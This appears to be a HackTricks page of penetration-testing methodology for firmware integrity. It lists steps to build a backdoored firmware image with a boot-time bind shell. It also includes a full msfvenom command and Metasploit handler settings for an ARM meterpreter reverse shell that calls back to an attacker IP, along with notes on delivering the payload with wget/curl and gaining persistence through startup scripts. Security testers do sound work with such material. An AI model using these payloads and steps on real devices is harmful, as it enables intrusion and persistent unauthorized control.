HackTricks
Search…
⌃K

Firmware Integrity

Support HackTricks and get benefits!
Attempt to upload custom firmware and/or compiled binaries for integrity or signature verification flaws. For example, compile a backdoor bind shell that starts upon boot using the following steps.
  1. 1.
    Extract firmware with firmware-mod-kit (FMK)
  2. 2.
    Identify the target firmware architecture and endianness
  3. 3.
    Build a cross compiler with Buildroot or use other methods that suits your environment
  4. 4.
    Use cross compiler to build the backdoor
  5. 5.
    Copy the backdoor to extracted firmware /usr/bin
  6. 6.
    Copy appropriate QEMU binary to extracted firmware rootfs
  7. 7.
    Emulate the backdoor using chroot and QEMU
  8. 8.
    Connect to backdoor via netcat
  9. 9.
    Remove QEMU binary from extracted firmware rootfs
  10. 10.
    Repackage the modified firmware with FMK
  11. 11.
    Test backdoored firmware by emulating with firmware analysis toolkit (FAT) and connecting to the target backdoor IP and port using netcat
If a root shell has already been obtained from dynamic analysis, bootloader manipulation, or hardware security testing means, attempt to execute precompiled malicious binaries such as implants or reverse shells. Consider using automated payload/implant tools used for command and control (C&C) frameworks. For example, Metasploit framework and ‘msfvenom’ can be leveraged using the following steps.
  1. 1.
    Identify the target firmware architecture and endianness
  2. 2.
    Use msfvenom to specify the appropriate target payload (-p), attacker host IP (LHOST=), listening port number (LPORT=) filetype (-f), architecture (--arch), platform (--platform linux or windows), and the output file (-o). For example, msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
  3. 3.
    Transfer the payload to the compromised device (e.g. Run a local webserver and wget/curl the payload to the filesystem) and ensure the payload has execution permissions
  4. 4.
    Prepare Metasploit to handle incoming requests. For example, start Metasploit with msfconsole and use the following settings according to the payload above: use exploit/multi/handler,
    • set payload linux/armle/meterpreter_reverse_tcp
    • set LHOST 192.168.1.245 #attacker host IP
    • set LPORT 445 #can be any unused port
    • set ExitOnSession false
    • exploit -j -z
  5. 5.
    Execute the meterpreter reverse 🐚 on the compromised device
  6. 6.
    Watch meterpreter sessions open
  7. 7.
    Perform post exploitation activities
If possible, identify a vulnerability within startup scripts to obtain persistent access to a device across reboots. Such vulnerabilities arise when startup scripts reference, symbolically link, or depend on code located in untrusted mounted locations such as SD cards, and flash volumes used for storage data outside of root filesystems.
Support HackTricks and get benefits!